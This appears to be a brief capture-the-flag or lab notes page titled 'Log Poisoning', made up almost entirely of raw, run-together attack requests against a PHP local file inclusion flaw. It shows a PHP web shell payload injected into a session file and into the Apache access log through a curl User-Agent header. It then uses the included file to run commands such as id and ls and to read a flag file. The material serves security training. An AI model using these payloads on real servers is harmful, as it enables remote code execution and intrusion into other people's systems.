Log Poisoning
April 22, 2024















Last updated
April 22, 2024















Last updated
http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24lhttp://94.237.62.149:55216/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3Ehttp://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=idhttp://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=pwdhttp://94.237.62.149:55216/index.php?language=/var/log/apache2/access.log'<?php system($_GET['cmd']); ?>'/index.php?language=/var/log/apache2/access.log&cmd=id/index.php?language=/var/log/apache2/access.log&cmd=ls/index.php?language=/var/log/apache2/access.log&cmd=cd%20%2F%3B%20ls%20
# cd /; ls
# just got url encoded/index.php?language=/var/log/apache2/access.log&cmd=cat%20%2Fc85ee5082f4c723ace6c0796e3a3db09.txt
# just url encodedcurl -s "http://94.237.62.149:40752/index.php" -A "<?php system($_GET['cmd']); ?>"/index.php?language=/var/log/apache2/access.log&cmd=id